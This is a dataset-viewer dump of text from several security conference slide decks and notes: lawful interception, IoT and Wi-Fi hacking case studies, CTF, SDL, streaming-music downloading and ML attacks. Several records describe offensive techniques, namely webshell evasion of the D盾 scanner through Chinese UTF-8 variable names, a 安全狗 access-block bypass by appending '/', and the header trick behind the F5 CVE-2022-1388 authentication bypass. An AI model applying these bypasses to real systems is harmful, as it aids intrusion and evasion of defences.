www.cipherwar.com
www.cyber-rights.org/interception
www.cyber-rights.org/interception
Q&A / Discussion
Q&A / Discussion
Does LI deliver added value to Law
Does LI deliver added value to Law
Enforcement
Enforcement’’s ability to protect the public?
s ability to protect the public?
What about open source Interception
What about open source Interception
tools?
tools?
Will there be a return of the Clipper Chip?
Will there be a return of the Clipper Chip?
Should there be mandated Key Escrow of
Should there be mandated Key Escrow of
ISP
ISP’’s encryption keys?
s encryption keys?
What types of oversight need to be built
What types of oversight need to be built
into the system to prevent abuse?
into the system to prevent abuse?
Thank You.
Thank You.
Jaya Baloo
Jaya Baloo
[email protected]
[email protected]
+31-6-51569107
+31-6-51569107 | pdf |
[Rabit2013@CloverSec]:~# whoami
ID: Rabit2013,Real name: 朱利军
[Rabit2013@CloverSec]:~# groupinfo
Job : CloverSec Co.,Ltd CSO & CloverSec Labs & Sec Lover
[Rabit2013@CloverSec]:~# cat Persional_Info.txt
•
西电研究生毕业(信息对抗、网络安全专业)
•
历届XDCTF组织与参与者
•
多届SSCTF网络攻防比赛组织与出题
•
某国企行业网络渗透评估
•
嵌入式漏洞挖掘挑战赛5个高危漏洞
•
通用Web应用系统漏洞挖掘若干
•
某国企单位安全培训
•
………….
About Me
About Team
CloverSec Labs
Binary
Java/Flash
安全防御软件
主流浏览器
操作系统
其他
Web
主流中间件
主流Web应用
其他
主流Web框架
Mobile Terminal
Android
iOS
Windows
Phone
Tablet
IoT/Industry/Car
其他
工控系统
车联网
嵌入式
Wear
Devices
u 发现多个Microsoft Windows内核提权漏洞 (CVE-2016-0095)
u 发现多个Adobe Flash Player任意代码执行漏洞
(CVE-2015-7633 CVE-2015-8418 CVE-2016-1012 CVE-2016-4121)
u 发现多个Oracle Java任意代码执行漏洞
(CVE-2016-3422,CVE-2016-3443)
u 发现多个360安全卫士内核提权漏洞(QTA-2016-028)
u 发现多个百度杀毒内核提权漏洞
u 率先发现苹果AirPlay协议认证漏洞
u 参加互联网嵌入式漏洞挖掘比赛,对某知名厂商提供的设备进行漏洞
挖掘,提交了5个高危漏洞
u 为TSRC、AFSRC提交漏洞若干
About Team
Hacking无处不在
Why?
---为何到处能Hacking
Where? ---Hacking的入口点在哪
What?
---哪些能Hacking
How?
---怎么去Hacking
[ Rabit2013@KCon ]
为何到处能Hacking
Why
[ Rabit2013@KCon ]
Web应用
各类CMS
各类OA
运维系统
内网管理
监控系统
云办公
云WAF
智能手表
摄像头
联网汽车
智能家居
无线路由
防御软件
工业系统
[ Rabit2013@KCon ]
漏洞
[ Rabit2013@KCon ]
SQL
注入
·······
XSS
攻击
文件
上传
命令
执行
代码
注入
信息
泄露
框架
注入
越权
访问
弱配置
弱口令
文件
下载
XXE
注入
CSRF
SSRF
传统漏洞
[ Rabit2013@KCon ]
新型漏洞
验证码
······
口令
爆破
撞库
业务
流程
身份
认证
API
接口
找回
密码
业务
授权
认证
时效
业务
一致
业务
篡改
输入
合法
弱加密
[ Rabit2013@KCon ]
Hacking无处不在
Why?
---为何到处能Hacking
Where? ---Hacking的入口点在哪
What?
---哪些能Hacking
How?
---怎么去Hacking
[ Rabit2013@KCon ]
Hacking的入口点在哪
Where
[ Rabit2013@KCon ]
系统本身
+ 数据传输
System =
安全与否
Testing
Fuzzing
Checking
[ Rabit2013@KCon ]
[ Rabit2013@KCon ]
得到的原始信号长这样
这里有个小诀窍,在抓取的时候建议
偏离中心信号一点,比如432.7MHz
可以避开信号尖峰影响
现在,有这么一个设备,通过遥
控器进行控制,遥控器使用
433MHz如何知道遥控器发送了
什么?
[ Rabit2013@KCon ]
[ Rabit2013@KCon ]
•
了解功能,使用范围,使用方法,以及能做什么
•
拆机看PCB,从各种组件上了解其架构,寻找调试接口(UART/TTL/JTAG)
•
加电,进行常规性检测(扫端口,看服务等)
•
截取信号进行分析,看它发送了什么,这些信号都是做什么的
•
弄到固件,拆包分析,对其中的关键程序进行逆向
•
重点关注Ping/Telnet等功能,尝试命令执行,进入白盒阶段
•
自制添加了后门的固件,尝试刷入,进入白盒阶段
•
其他脑洞大开的想法、做法
[ Rabit2013@KCon ]
•
以高权限登入设备,对自己的一些想法进行验证。
•
对外通信内容进行分析,构造Payload,跑一下
•
连接调试接口,看终端打印信息
•
利用QEMU进行动态调试,下断试错等
•
从终端到云端(如果有的话)
•
站在上帝视角,寻找更多问题,物联网不只是pwn it就完了
•
一个小玩意引发的血案(基于物联网设备的内网漫游)
接口安全
服务安全
固件安全
通信安全
协议安全
额外的访问URL
认证接口
等等
不必要的端口
特殊功能端口
测试端口
明文固件
混淆不彻底
内存Dump
WIFI
蓝牙
移动通信
协议缺陷
协议逻辑
红外
额外字段
入手点
[ Rabit2013@KCon ]
Hacking无处不在
Why?
---为何到处能Hacking
Where? ---Hacking的入口点在哪
What?
---哪些能Hacking
How?
---怎么去Hacking
[ Rabit2013@KCon ]
哪些能Hacking
What
[ Rabit2013@KCon ]
生活中都有哪些设备
设备的安全隐患
曾经出现过比较大的安全设备的漏洞
例如越权、远程命令执行、弱口令等等
Hacking无处不在
Why?
---为何到处能Hacking
Where? ---Hacking的入口点在哪
What?
---哪些能Hacking
How?
---怎么去Hacking
[ Rabit2013@KCon ]
怎么去Hacking
How
[ Rabit2013@KCon ]
案例1、一个WiFi引发的思考
案例2、公司网络真的安全吗?
案例3、物理隔离真的安全吗?
案例4、生活中还有哪些Hacking?
怎么去Hacking
How
[ Rabit2013@KCon ]
案例1、一个WiFi引发的思考
WIFI破解
案例1、一个WiFi引发的思考
WIFI破解
案例1、一个WiFi引发的思考
WIFI破解
中间人劫持获取隔壁WiFi主人信息,
获取Cookie/Session/Token/账号,
登陆,能玩的还有很多…………
案例1、一个WiFi引发的思考
中间人
案例1、一个WiFi引发的思考
案例2、公司网络真的安全吗?
案例3、物理隔离真的安全吗?
案例4、生活中还有哪些Hacking?
怎么去Hacking
How
[ Rabit2013@KCon ]
案例2、公司网络真的安全吗?
WIFI万能钥匙
通过扫描/Ping/Traceroute等
判断网络结构和网络信息
案例2、公司网络真的安全吗?
网络信息收集
192.168.10.0/24
192.168.20.0/24
192.168.30.0/24
192.168.100.0/24
192.168.120.0/24
192.168.140.0/24
192.168.150.0/24
检测各个网段主机端口
案例2、公司网络真的安全吗?
服务端口探测
案例2、公司网络真的安全吗?
路由漏洞利用
案例2、公司网络真的安全吗?
上传Shell
案例2、公司网络真的安全吗?
信息获取
网络结构尽收眼底!!!!
案例2、公司网络真的安全吗?
路由管理
案例2、公司网络真的安全吗?
内网突破
案例1、一个WiFi引发的思考
案例2、公司网络真的安全吗?
案例3、物理隔离真的安全吗?
案例4、生活中还有哪些Hacking?
怎么去Hacking
How
[ Rabit2013@KCon ]
案例3、生活中还有哪些Hacking?
WiFi音频录像机
下载下来之后是一个形如backup-
EZVIZ-2016-08-20.tar.gz文件名的压
缩文件,解开之后在Etc/config/中有
一个telnet的配置文件,默认情况
telnet是关闭的,配置文件中该设置为
0
在这里将0改为1之后,将配置上传到路
由器
然后重启路由器
即可开启该路由的Telnet功能
案例3、生活中还有哪些Hacking?
WiFi音频录像机
其中5555端口为ADB远程调试端口
可以使用adb工具来远程连接到视频盒子
由于盒子上的ADB服务是以root权限运行的
所以连接上去的ADB默认也是root
不过视频盒子的固件当中没有su的二进制程序
这里需要把su上传到视频盒子
案例3、生活中还有哪些Hacking?
互联网视频盒子
然后将su二进制文件和Supersu.apk
上传到视频盒子,给予su执行权,这
样就把盒子root了
另外由于视频推送未认证,可劫持正在播放的视频
案例3、生活中还有哪些Hacking?
互联网视频盒子
案例3、生活中还有哪些Hacking?
网络摄像头
案例3、生活中还有哪些Hacking?
网络摄像头
案例1、一个WiFi引发的思考
案例2、公司网络真的安全吗?
案例3、物理隔离真的安全吗?
案例4、生活中还有哪些Hacking?
怎么去Hacking
How
[ Rabit2013@KCon ]
案例4、物理隔离真的安全吗?
剑走偏锋
前往
目标区域
投放
扫描&连入网络
案例4、物理隔离真的安全吗?
剑走偏锋
建立通信隧道
各类服务器/工控机
案例4、物理隔离真的安全吗?
剑走偏锋
Thanks
四叶草安全
CloverSec Labs
[ Rabit2013@KCon ]
Wechat:Rabit-2013 | pdf |
Introduction to CTF
Traditional Course Practice
More theory and basic concept, but less
practice and lab
Offensive Thinking
Think like a hacker
Real World Attack
Overall attack life cycle
Reconnaissance
Gaining Access
Maintain Access
Clearing Tracks
Need to cope with many fussy work
Most security issue
Too simple to find
Too complex
The other way for security
training
CTF as the training for offensive security
Spread security techniques
Measure security skill
Practice, practice and more practice
Emulate real world problems
Environment close to real environment
Eliminate the boring task and focus on advanced
security skill
Capture the Flag
The competition to steal data, a.k.a
flag, from other computers
EX. Steal admin password from a web
server
Most problems are related to
information security
Good practice for students and even the
experts
CTF
Starting from Defcon 4 in 1996
Format is a mystery...
Held every year since 1996
The most important CTF now
UCSB iCTF first held in 2001
The first CTF be held by academic
organization
CTF around the world
To enhance education of offensive
security, CTFs are held in many country
U.S: DEFCON, Ghost In the Shellcode,
PlaidCTF
CTF around the world
To enhance education of offensive
security, CTFs are held in many country
Japan: SECCON, TMCTF, MMACTF
CTF around the world
To enhance education of offensive
security, CTFs are held in many country
Korea: CodeGate, SECUINSIDE
CTF around the world
To enhance education of offensive
security, CTFs are held in many country
China: XCTF, BCTF, 0CTF, …..
CTF around the world
To enhance education of offensive
security, CTFs are held in many country
Russia: RuCTF
France: Nuit du Hack
CTF
Malaysia: HITB CTF
Colombia: Backdoor
CTF
CTFTime
Created by
kyprizel (MSLC) in 2010
Centralize ranking
and statistic website
Trend of CTFs
CTF contest
Less than 10 in 2010
More than 50 CTFs in 2014
CTF teams
More than
6000 teams in
2014
Many famous
teams
Famous CTF teams
PPP(US, CMU)
HITCON(TW)
217(TW, NTU)
0ops(China, Shanghai
Jiao Tong University)
Blue-Lotus(China,
Tsinghua University)
Dragon Sector(Poland)
Gallopsled(Danmark)
Shellphish(US, UCSB)
DEFKOR(Korea)
Dragon Sector
0ops
Students from Shanghai Jiao Tong
University and Keen Team
Winner of Pwn2Own 2014
PPP
CMU CYLAB
Why CTF
Practice your hacking skills
Compete with top hackers among the
world
CTF TYPES
JeoPardy
Problems are classified into different disciplines
Most JeoPardy CTF contain 20~30 problems
Pwn, Reverse Engineering, Web security, Forensics and
Cryptography
More difficult problem worth more score
About 90% CTFs are in JeoPardy style
Can be held online and hundred of teams can involve
JeoPardy
JeoPardy CTF in this years
Problems in JeoPardy
Web
Crypto
Forensic
Reverse
Pwn (Software Exploitation)
22
Attack & Defense
The competitors are put into the closed
environment and try to attack each
other’s.
The server with vulnerable programs
running
Competitor needed to patch(fix) the
vulnerability and exploit(attack) the
other teams
Attack & Defense
Need good support of networking
environment
Less CTFs are in Attack & Defense style
Can do many interesting things
Skills needed
Vulnerability discovery and patching
Network flow analysis
System administrator
Backdoor
CTCTF & NSCTF
Attack & Defense
iCTF
RuCTF
CTCTF
Final project of
network security last
year
Defcon Final
HITCON Final
SECCON Final
King of Hill
There are several servers provided
Competitors should compromise and keep
control to the server
The more time you own the machine, the
more score can be got
Just like real-world cyber war
Attack not only need to attack, but also need
to prevent other exploit server you owned
King of Hill
Which CTF to play?
Beginner CTFs
Backdoor
CSAW Qualification
ASIS
Advanced CTFs
DEFCON
PlaidCTF
最強PPP組織的比賽
CodeGate
韓國
SECCON
日本
PHD Qals
More than 100 CTF’s each year, you can find the proper
CTF
Travel Around the World
Game Hacking
QR Code
BambooFox
Our team, most students come from
NCTU and NCU
EXPERIENCE SHARING
34
Focus !
When you start to CTF, it is best to
focus on one type of problem.
E.g. Pwn, Reverse, Web….
When playing CTF, keep up with 1
problem in the same time
35
Following New Techniques
Hackers like new techniques
CTF organizer often proposes problem
with these new techniques
Follow up new technique
Freebuf
Reddit Hacking, NetSec and
ReverseEngineering Channel
36
Customize Your CTF Toolset
Prepare your own environment
With your favorite tools
Customize it. Make your operation more
efficient.
Keep and refine the toolset and program
after every CTF
Even better to come up with the writeup
37
Review the Problems
Review the problem you are unable to
solve during CTF
Read the writeup
38
Practice, practice and practice
Experience and proficiency play the
important role in CTF
Experience make you find the right way
earlier
Proficiency make you try more
approaches than others
Practice, practice ,practice , practice …..
39
Enjoy the Game
Don't panic. Keep calm and carry on.
40
Q&A
41 | pdf |
企业SDL实践与经验
美图安全经理、Security Paper发起人
SDL是什么
标准化
SDL基本流程
1. 安全培训
2. 需求评估
3. 产品设计
4. 代码编写
5. 渗透测试
6. 上线发布
7. 应急响应
安全培训 – 意识
WEB安全培训
• 针对服务端开发
• 哪里容易出现漏洞
• 怎么写会更安全
APP安全培训
• 针对APP开发
• 数据加密存储
• 不应该存储敏感数据
安全意识
• 针对全体项目成员
• 敏感数据处理办法
• 如何发送敏感数据
需求评估&产品设计 — 覆盖
应用系统自身架构安全
应用系统软件功能安全设计要求
应用系统存储安全设计要求
应用系统通讯安全设计要求
应用系统数据库安全设计要求
应用系统数据安全设计要求
后门参数
部署安全检查
身份认证逻辑安全
数据访问机制
集中验证
外部一体化
入口点
外部API
代码编写 — 规范
危险函数
安全配置
框架安全
常见安全问题代码示例
渗透测试 — 速度&深度
自劢化扫描
常见场景快速测试点
代码安全检查
上线发布
1.
安全嵌入上线流程
2.
安全准入
3.
安全检查
应急响应
应急响应方案
确保方案落地到人
有电话号码
遏制
复盘
为什么流程这么难推动?
君子协定到底可以不可以?
金杯共饮之 白刃不相饶!
Security Paper
遏制 | pdf |
一种 UTF-8 编码中文变量过 D 盾的方法
大家好,我是菜菜 reborn。起因是今天在复习 PHP 代码基础,从基
本的变量开始复习起,发现 PHP 变量原来支持中文,然后想起大佬
们都会做免杀,心血来潮想试试中文变量是否可以免杀。
第一种
第二种
然后我就写了两个简单的 assert 的这种马,当然高版本不支持 assert
了。
第一种是一开始我写的,然后我刚写完是不免杀的,4 级 D 盾,我转
成 UTF-8 的编码后,D 盾就杀不到了。
具体转的方式是用 notepad++转的。
第二种我刚写的时候 D 盾是 1 级。
然后转 UTF-8 后也是杀不到了。我不是很懂这里面的编码原理,但是
确实是过了下载的新版 D 盾,所以把发现的这个方法分享给大家。 | pdf |
Franz Payer
Tactical Network Solutions
http://cyberexplo.it
Acknowledgements
Zachary Cutlip
Craig Heffner
Tactical Network Solutions
What I’m going to talk about
Music streaming basics
Security investigation process
Music player mimicking
Exploit demo
Man-in-the-middle interception
Questions
What is streaming?
A way to constantly receive and present
data while it is being delivered by a
provider – Wikipedia
2 methods
Custom protocol
HTTP
Where’s the vulnerability?
Music files can be retrieved by
mimicking the client player
Web traffic is easily intercepted
Can be done entirely from the browser
Process
Locate music file in network traffic
Inspect any parameters in the request
Locate origin of those parameters
Page URL
Page source
JavaScript
Attempt to replicate the request
Target: Aimini
Flash
Almost nonexistent security
Good first target
Don’t even need to look at the code
Analyzing the target
The cheap way out
The cheap way out
Analyzing the target: song file
Analyzing the target: song file
Demo Time
Target: Grooveshark
HTML5
Several factors of authentication
Minified JavaScript
Not for the faint of heart
JavaScript beautifier
You’re going to need it
http://jsbeautifier.org/
Analyzing the target: song file
Analyzing the target: more.php
Analyzing the target: more.php
So now what?
We need:
streamKey
How do we get it?
more.php - getStreamKeyFromSongIDEx
Session - ?
Token - ?
UUID - ?
songID - ?
more.php - getCommunicationToken
Looking for variables – app.min.js
Recap
We need:
streamKey
How do we get it?
more.php - getStreamKeyFromSongIDEx
Session – window.GS.config
Token - ?
UUID - ?
songID - window.GS.models.queue.models
more.php - getCommunicationToken
Looking for variables – app.min.js
Recap
We need:
streamKey
How do we get it?
more.php - getStreamKeyFromSongIDEx
Session – window.GS.config
Token - ?
UUID – copied function from app.min.js
songID - window.GS.models.queue.models
more.php - getCommunicationToken
Looking for variables – app.min.js
Looking for variables – app.min.js
Demo Time
Things I learned
Downloading music is a waste of time
Impossible to completely protect streaming
Hacking easier than coding?
Things you should know
People have bad security (shocker)
Several services will patch their stuff now
Several services won’t patch their stuff
The same web-traffic logging will work with
some video streaming websites too.
Mitigations
Current technology
One-time use tokens
Encrypted streams (rtmpe)
Returning songs in pieces
Code obfuscation
Future proofing:
HTML5 audio tag with DRM support
“HTTP Live Streaming as a Secure
Streaming Method” – Bobby Kania, Luke
Gusukuma
But Wait, There’s More
Man-in-the-middle
Multiple steps to install
Requires an additional Google-App
Enable dev mode
Enable Experimental Extension APIs
chrome://flags
http://music.com/file.mp3
http://music.com/file.mp3
301 – http://localhost:8080
http://localhost:8080
200 or 206
200 or 206
Why no demo?
Unstable
Cannot access socket after 1 or 2 requests
Requires browser-restart to fix
Unrealistic
Who would actually install this?
Try again in a few months
Node.js community support
Chromify
Browserify
References
One Click Music
http://cyberexplo.it/static/OneClickMusic.crx
HTTP Live Streaming as a Secure Streaming Method
http://vtechworks.lib.vt.edu/bitstream/handle/10919/18662/Instru
ctions%20for%20HTTP%20Live%20Streaming%20Final.pdf
JS Beautifier
http://jsbeautifier.org/
Chromify
https://code.google.com/p/chromify/
Browserify
https://github.com/substack/node-browserify
Questions? | pdf |
11
Machine Learning
22
Machine Learning as a Tool
33
Machine Learning as a Tool for Societal
Exploitation
44
A Summary on the Current and Future
State of Affairs
55
A Bit About Me
(I‘m going to pretend you care)
66
F1F1cin
Student at Columbia
University in New York
Independent Researcher
Mostly focus on malware
Probably younger than
you think
I want to hack a human
one day (judge all you
want)
77
Current State
The Common and the Uncommon
88
Standard Uses
(generally beneficial, sometimes concerning)
99
The „Human“ Side
Financial Trading
Sports Injuries – [courtesy
of Quantum Black]
1010
The „Technical“ Side
Data Security
Antivirus Software
Endpoint Detection
Systems
1111
The „Technical“ Side
Data Security
Antivirus Software
Endpoint Detection
Systems
„Normal“ people don‘t think about this…
(?)
1212
Uncommon Uses
(usually concerning, generally cool)
R EALLY
1313
Crazy Dystopian S**t
Ambient Sound Mapping
–
Determine precise location and orientation through
microphone-embedded devices [without consent]
Individual Profling
–
Recreating the human based on digital fngerprints
1414
Ambient Sound Mapping
1515
Crazy Dystopian S**t
Ambient Sound Mapping
–
Determine precise location and orientation through
microphone-embedded devices [without consent]
Individual Profling
–
Recreating the human based on digital fngerprints
–
Actually more common than I give it credit for
1616
Individual Profiling
1717
The Future of Attack
1818
FIRST THING TO REMEMBER
1919
AI is NOT Attackproof
(I‘m sure you know this)
2020
AI is NOT Attackproof
„Attack“ isn‘t limited to
using AI as a weapon
2121
AI is NOT Attackproof
„Attack“ isn‘t limited to
using AI as a weapon
„Attack“ can mean attacks
targetted towards AI
systems
2222
AI as a Weapon
2323
Current Experiments /
Research /
whatever you want to call it
2424
„Whatever you want to call it“
Wargames – [courtesy of Endgame]
Intelligent Malware
Adapting to a changing environment
2525
Attacks on AI Systems
2626
This is not what I Typically Do
BUT
2727
This is not what I Typically Do
BUT
Accidentally joining an AI-based IDS research group
drags you into things
2828
This is not what I Typically Do
BUT
Accidentally joining an AI-based IDS research group
drags you into things
Saying you‘re interested in malware makes people
think you write it for fun (and no proft)
2929
This is not what I Typically Do
BUT
Accidentally joining an AI-based IDS research group
drags you into things
Saying you‘re interested in malware makes people
think you write it for fun (and no proft)
So you‘re put in the attack/testing team
3030
This is not what I Typically Do
BUT
Accidentally joining an AI-based IDS research group
drags you into things
Saying you‘re interested in malware makes people
think you write it for fun (and no proft)
So you‘re put in the attack/testing team, and then you
realize you actually like it
3131
What Can We Do?
The research scenario and its limitations
3232
What Can We Do?
The research scenario and its limitations
Let‘s remember things that happened throughout the
weekend.
3333
What Can We Do?
The research scenario and its limitations
Let‘s remember things that happened throughout the
weekend. (and things coming up)
What else is can be treated in a similar manner?
3434
Attacking the Human
(one of my goals, but kind of far-fetched at the moment)
3535
Attacking the Human
(one of my goals, but kind of far-fetched at the moment)
LET YS IGNO R E S O CIAL ENGINEER ING FO R A
LET YS IGNO R E S O CIAL ENGINEER ING FO R A
MO MENT
MO MENT
3636
The Future of
Defense
3737
Tricking AI in Practice
(and why this is importatnt for defense mechanisms)
3838
The Overlaps
You might notice overlaps between attack and defense
Like any other tool, AI can be used on both ends of the
spectrum, sometimes without much modifcation
3939
Defense for the Common Man
…
(Attack against the algorithm)
4040
A Sample of Defense :
Avoiding Identification
4141
We Have Seen This Before
4242
Demo time ? | pdf |
1
Webshell 访问拦截绕过时候怎么办
安全狗不单单只拦截上传内容,还会检测拦截访问内容,若匹配中了访问规则,就会被拦截。绕
过很简单,只需要在访问的⽂件名后⾯加 / 就能绕过拦截。
正常请求:
绕过请求:
C
复制代码
http://192.168.142.140/coon.php
1
C
复制代码
http://192.168.142.140/coon.php/
1
2
该技巧仅在 WIndows 下⾯ PHP 7.1.32 安全狗的环境下测试成功,其他环境师傅请⾃测 | pdf |
f5
0x00
f5 big-iprceCVE-2022-1388httpd
pocconnection keepalive
smugglingsmugglingsmugglingpre-auth rcechybeta
hop-by-hophttps://t.zsxq.com/juJIAeEhop-by-hop
https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
0x01 hop-by-hop
rfchttp
end-to-endhop-by-hop
Keep-Alive, Transfer-Encoding, TE, Connection, Trailer, Upgrade, Proxy-Authorization, Proxy-Authenticate
RFC
hop-by-hopconnection
Connection: close, X-Foo, X-Bar
X-FooX-Bar
connection
custom ⸺> apache proxy -> ->
proxyurlurlproxy
url
hop-by-hopconnectionapache proxy
f5
0x02 f5
pochttps://twitter.com/AnnaViolet20/status/1523564632140509184poc
poc
Connection: keep-alive,X-F5-Auth-Token
X-F5-Auth-Token:a
f5 X-F5-Auth-Token hop-by-hop
1. X-F5-Auth-Tokenhop
token401serverapacheapache
2. hoptoken
serverapachejavajava
token
3. tokenhop
f5hop-by-hop apacheurl
token hop-by-hoptoken
javajavatoken
0x03 hop-by-hop
forwards connection headerconnectionhoplistforwards connection
header
connection
connection
You may have noticed that the Connection header itself is listed above as a default hop-by-hop header. This would
suggest a compliant proxy should not be forwarding a request's list of custom hop-by-hop headers to the next server
in the chain in its Connection header when it forwards the request - that is, a compliant proxy should consume the
requests' Connection header entirely. However, my research suggests this may not always be occurring as expected -
some systems appear to either also forward the entire Connection header, or copy the hop-by-hop list and append it
to its own Connection header. For example, HAProxy appears to pass the Connection header through untouched, as does
Nginx when acting as a proxy.
HAProxynginxconnection
nginxapachenginx
1. apacherfchop-by-hopconnection
2. nginxconnectionconnection
F5apachenginx
F5
apachenginxconnectionconnection
0x04
java
1. url
2. tokenurl
3. hop-by-hop | pdf |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.